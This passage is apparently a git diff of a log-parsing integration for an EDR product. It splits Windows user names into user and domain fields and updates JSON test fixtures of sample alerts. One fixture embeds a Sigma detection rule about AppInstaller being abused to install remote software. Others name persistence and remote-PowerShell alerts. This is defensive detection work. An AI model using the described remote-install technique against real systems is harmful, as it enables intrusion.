"{{json_event.message.eventlog.event_data.get('Type Name')}}" + action.properties.Unused2: "{{json_event.message.eventlog.event_data.get('Unused2')}}" + action.properties.Unused3: "{{json_event.message.eventlog.event_data.get('Unused3')}}" + action.properties.Unused4: "{{json_event.message.eventlog.event_data.get('Unused4')}}" + action.properties.Unused5: "{{json_event.message.eventlog.event_data.get('Unused5')}}" + action.properties.Unused6: "{{json_event.message.eventlog.event_data.get('Unused6')}}" + action.properties.Unused: "{{json_event.message.eventlog.event_data.get('Unused')}}" + action.properties.User: "{{json_event.message.eventlog.event_data.get('User')}}" + action.properties.ValidatedPolicy: "{{json_event.message.eventlog.event_data.get('ValidatedPolicy')}}" + action.properties.ValidatedSigningLevel: "{{json_event.message.eventlog.event_data.get('ValidatedSigningLevel')}}" + action.properties.VerificationError: "{{json_event.message.eventlog.event_data.get('VerificationError')}}" + action.properties.VirtualAccount: "{{json_event.message.eventlog.event_data.get('VirtualAccount')}}" + action.properties.WorkstationName: "{{json_event.message.eventlog.event_data.get('WorkstationName')}}" + action.properties.ClassName: "{{json_event.message.eventlog.event_data.get('ClassName')}}" + action.properties.param0: "{{json_event.message.eventlog.event_data.get('param0')}}" + action.properties.param10: "{{json_event.message.eventlog.event_data.get('param10')}}" + action.properties.param11: "{{json_event.message.eventlog.event_data.get('param11')}}" + action.properties.param12: "{{json_event.message.eventlog.event_data.get('param12')}}" + action.properties.param13: "{{json_event.message.eventlog.event_data.get('param13')}}" + action.properties.param14: "{{json_event.message.eventlog.event_data.get('param14')}}" + action.properties.param15: "{{json_event.message.eventlog.event_data.get('param15')}}" + action.properties.param16: "{{json_event.message.eventlog.event_data.get('param16')}}" + action.properties.param17: "{{json_event.message.eventlog.event_data.get('param17')}}" + action.properties.param18: "{{json_event.message.eventlog.event_data.get('param18')}}" + action.properties.param19: "{{json_event.message.eventlog.event_data.get('param19')}}" + action.properties.param1: "{{json_event.message.eventlog.event_data.get('param1')}}" + action.properties.param20: "{{json_event.message.eventlog.event_data.get('param20')}}" + action.properties.param21: "{{json_event.message.eventlog.event_data.get('param21')}}" + action.properties.param22: "{{json_event.message.eventlog.event_data.get('param22')}}" + action.properties.param2: "{{json_event.message.eventlog.event_data.get('param2')}}" + action.properties.param3: "{{json_event.message.eventlog.event_data.get('param3')}}" + action.properties.param4: "{{json_event.message.eventlog.event_data.get('param4')}}" + action.properties.param5: "{{json_event.message.eventlog.event_data.get('param5')}}" + action.properties.param6: "{{json_event.message.eventlog.event_data.get('param6')}}" + action.properties.param7: "{{json_event.message.eventlog.event_data.get('param7')}}" + action.properties.param8: "{{json_event.message.eventlog.event_data.get('param8')}}" + action.properties.param9: "{{json_event.message.eventlog.event_data.get('param9')}}" + action.properties.TaskContentNew_Command: "{{parse_task_info_2.message.Task.Actions.Exec.Command}}" + action.properties.TaskContentNew_Args: "{{parse_task_info_2.message.Task.Actions.Exec.Arguments}}" + filter: "{{json_event.message.eventlog.event_data != null}}" + + - set: + source.ip: "{{json_event.message.eventlog.event_data.IpAddress}}" + filter: "{{json_event.message.eventlog.event_data.IpAddress | is_ipaddress}}" authentication_info: actions: @@ -495,9 +756,29 @@ stages: event.code: "{{json_event.message.windows.event_id}}" event.action: "{{json_event.message.object_type}}" user.id: "{{json_event.message.windows.source_sid}}" - user.name: "{{json_event.message.source_username}}" user.target.id: "{{json_event.message.windows.target_sid}}" - user.target.name: "{{json_event.message.target_username}}" + + user.name: > + {%- if '\\' not in json_event.message.source_username -%} + {{ json_event.message.source_username }} + {%- else -%} + {{ json_event.message.source_username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.source_username -%} + {{ json_event.message.source_username.split('\\')[0] }} + {%- endif -%} + + user.target.name: > + {%- if '\\' not in json_event.message.target_username -%} + {{ json_event.message.target_username }} + {%- else -%} + {{ json_event.message.target_username.split('\\')[1] }} + {%- endif -%} + user.target.domain: > + {%- if '\\' in json_event.message.target_username -%} + {{ json_event.message.target_username.split('\\')[0] }} + {%- endif -%} dns_info: actions: @@ -506,10 +787,20 @@ stages: event.type: ["info"] process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.process_image_path}}" - user.name: "{{json_event.message.username}}" dns.question.type: "{{json_event.message.query_type}}" dns.question.name: "{{json_event.message.requested_name}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + auditlog_info: actions: - set: @@ -519,11 +810,21 @@ stages: http.response.status_code: "{{json_event.message.response_status_code}}" url.path: "{{json_event.message.request_path}}" user_agent.original: "{{json_event.message.user_agent}}" - user.name: "{{json_event.message.username}}" source.ip: "{{json_event.message.ip_address}}" event.reason: "{{json_event.message.log_description}}" event.action: "{{json_event.message.log_slug}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + agentlog_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/alert.json b/HarfangLab/harfanglab/tests/alert.json index 0f8e1a0d4..6acde1285 100644 --- a/HarfangLab/harfanglab/tests/alert.json +++ b/HarfangLab/harfanglab/tests/alert.json @@ -76,7 +76,7 @@ "REDACTED" ], "user": [ - "REDACTED\\valves" + "valves" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "YARA binary check" }, "user": { - "name": "REDACTED\\valves" + "domain": "REDACTED", + "name": "valves" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json index b69152813..484cfee47 100644 --- a/HarfangLab/harfanglab/tests/alert_1.json +++ b/HarfangLab/harfanglab/tests/alert_1.json @@ -35,7 +35,8 @@ "execution": 0, "groups": [], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "2971" }, "host": { "domain": "EXAMPLE", @@ -77,7 +78,7 @@ "PL-3049" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -87,7 +88,8 @@ "name": "File Added/Modified in Startup Directory" }, "user": { - "name": "EXAMPLE\\jdoe" + "domain": "EXAMPLE", + "name": "jdoe" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json index 310b001a9..ffb3dd936 100644 --- a/HarfangLab/harfanglab/tests/alert_2.json +++ b/HarfangLab/harfanglab/tests/alert_2.json @@ -35,7 +35,8 @@ "{\"id\": \"00000000-0000-0000-0000-000000000000\", \"name\": \"EXAMPLE\"}" ], "level": "medium", - "status": "new" + "status": "new", + "threat_key": "2912" }, "host": { "domain": "EXAMPLE", @@ -83,7 +84,7 @@ "PL3024" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -93,7 +94,8 @@ "name": "Registry Autorun Key Added" }, "user": { - "name": "EXAMPLE\\jdoe", + "domain": "EXAMPLE", + "name": "jdoe", "roles": "EXAMPLE" } } diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json index db3a57056..4ea4e0884 100644 --- a/HarfangLab/harfanglab/tests/alert_3.json +++ b/HarfangLab/harfanglab/tests/alert_3.json @@ -42,7 +42,8 @@ "script_path": "C:\\Scripts\\SomeWhere\\Get-FaInterco\\Get-FaNetworkFlowV2.ps1" } }, - "status": "new" + "status": "new", + "threat_key": "16364" }, "host": { "domain": "Example", @@ -84,7 +85,7 @@ "SRV001" ], "user": [ - "EXAMPLE\\j.doe" + "j.doe" ] }, "rule": { @@ -94,7 +95,8 @@ "name": "PowerShellInvoke-CommandExecutedonRemoteHost" }, "user": { - "name": "EXAMPLE\\j.doe", + "domain": "EXAMPLE", + "name": "j.doe", "roles": "Servers" } } diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json new file mode 100644 index 000000000..c0c748a53 --- /dev/null +++ b/HarfangLab/harfanglab/tests/alert_4.json @@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + "harfanglab": { + "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c", + "alert_subtype": "process", + "alert_time": "2024-11-18T09:18:31.852+00:00", + "alert_unique_id": "11111111-2222-3333-4444-555555555555", + "execution": 0, + "groups": [ + "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}" + ], + "level": "medium", + "status": "new", + "threat_key": "1343" + }, + "host": { + "domain": "DOMAINSI", + "hostname": "HOST01", + "name": "HOST01", + "os": { + "full": "Windows 10 Pro", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "HOST01" + }, + "process": { + "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca", + "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe", + "name": "AppInstaller.exe", + "parent": { + "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p", + "executable": "C:\\Windows\\System32\\svchost.exe" + }, + "pe": { + "company": "Microsoft Corporation", + "description": "AppInstaller.exe", + "file_version": "1.24.25180.00000", + "imphash": "714FD4ADFC932C947A3949463867BE18", + "original_file_name": "AppInstaller.exe", + "product": "Microsoft Desktop App Installer" + }, + "pid": 20188, + "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\" + }, + "related": { + "hash": [ + "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45", + 